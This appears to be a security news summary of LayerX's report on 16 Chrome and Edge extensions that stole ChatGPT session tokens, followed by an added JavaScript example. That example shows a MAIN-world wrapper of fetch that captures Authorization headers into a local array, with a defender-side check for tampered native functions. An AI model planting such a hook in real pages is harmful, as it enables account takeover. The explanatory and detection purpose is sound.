A threat actor published 16 browser extensions to the official Chrome Web Store and Microsoft Edge Add-ons marketplace designed to steal users' ChatGPT session authentication tokens. LayerX says the extensions inject MAIN-world content scripts into chatgpt.com to intercept and exfiltrate authorization headers and related metadata, giving the operator persistent access to victims' accounts; because the scripts run in the page's own JavaScript context, the activity is hard to distinguish from ordinary web traffic. #ChatGPT #LayerX
Keypoints
- A single threat actor published 16 extensions (15 on Chrome, 1 on Edge) marketed as ChatGPT enhancement and productivity tools.
- The extensions inject content scripts into chatgpt.com that execute in the MAIN JavaScript world (the same context as the site's own scripts, rather than the extension's isolated world) to monitor outbound requests and capture authorization tokens.
- Captured session tokens, extension metadata, telemetry, and access tokens are exfiltrated to a remote server, enabling account access and behavioral profiling.
- The tools had over 900 combined downloads and were still available in official stores as of January 26, according to LayerX.
- LayerX links the extensions through shared code, icons, and publisher traits, and warns that MAIN-world execution makes detection difficult for traditional security tools, since the hooking happens inside the page's own JavaScript rather than in an isolated extension context.
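To make the interception technique described in the key points concrete, below is an added JavaScript example written for this page; it is not code from LayerX or from the extensions themselves. It simulates what a MAIN-world script can do once it shares the page's JavaScript context: replace the page's `fetch` with a wrapper that reads the Authorization header of every outbound call before forwarding it. Alongside it is the check a defender can run from the same context, which relies on the fact that a wrapper is a plain script function while the browser's built-in `fetch` reports `[native code]`. The function names (`captureAuthorization`, `readAuthorization`, `isNativeFunction`), the constructed `fetch`-like target, and the sample token are assumptions made for the example; no network request is issued.

```javascript
// Added example (not the extensions' or LayerX's code): simulated MAIN-world
// interception of the Authorization header, plus a defender-side check.
// Function names and the sample token below are constructed for illustration.

// Extract the Authorization header from the argument shapes fetch() accepts:
// init.headers as a plain object, an array of pairs, or a Headers instance,
// or a Request object passed as `input` (its .headers is a Headers instance).
function readAuthorization(input, init) {
  const headers = (init && init.headers) || (input && input.headers);
  if (!headers) return null;
  if (typeof headers.get === 'function') {
    return headers.get('authorization'); // Headers lookups are case-insensitive
  }
  if (Array.isArray(headers)) {
    const pair = headers.find(([name]) => name.toLowerCase() === 'authorization');
    return pair ? pair[1] : null;
  }
  const key = Object.keys(headers).find(k => k.toLowerCase() === 'authorization');
  return key ? headers[key] : null;
}

// Attacker-side shape of the technique: wrap target.fetch so every call's
// Authorization header is pushed into `sink` before the real request proceeds.
// In a real extension `target` would be `window` and `sink` an exfiltration
// channel; here it is any object with a fetch-like function and an array.
// Returns the original function so a caller can restore it.
function captureAuthorization(target, sink) {
  const original = target.fetch;
  target.fetch = function (input, init) {
    const header = readAuthorization(input, init);
    if (header) sink.push(header);
    return original.call(this, input, init); // page sees normal behaviour
  };
  return original;
}

// Defender-side check: Function.prototype.toString on a built-in yields
// "function fetch() { [native code] }", whereas a script-defined wrapper
// exposes its own source text. Uses Function.prototype.toString directly so
// an overridden fn.toString cannot answer on the function's behalf.
function isNativeFunction(fn) {
  const source = Function.prototype.toString.call(fn);
  return /\{\s*\[native code\]\s*\}$/.test(source);
}

// Self-contained demonstration on a constructed target (no real network I/O).
function demo() {
  const captured = [];
  const page = {
    fetch(input, init) { return Promise.resolve({ ok: true, input, init }); },
  };
  const nativeBefore = isNativeFunction(page.fetch); // false: it is script-defined here
  captureAuthorization(page, captured);
  page.fetch('https://chatgpt.com/backend-api/conversation', {
    headers: { Authorization: 'Bearer constructed-sample-token' },
  });
  return { captured, nativeBefore, nativeAfter: isNativeFunction(page.fetch) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Two caveats when using the `isNativeFunction` check in a real page: a script that wraps `fetch` can also wrap `Function.prototype.toString` to lie about it, and a `bind()`-produced function also reports `[native code]`, so treat a passing check as weak evidence rather than proof that `fetch` is untouched. The same wrapping applies to `XMLHttpRequest.prototype.setRequestHeader`, which is the other path a page can use to send a bearer token.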
Read More: https://www.securityweek.com/chrome-edge-extensions-caught-stealing-chatgpt-sessions/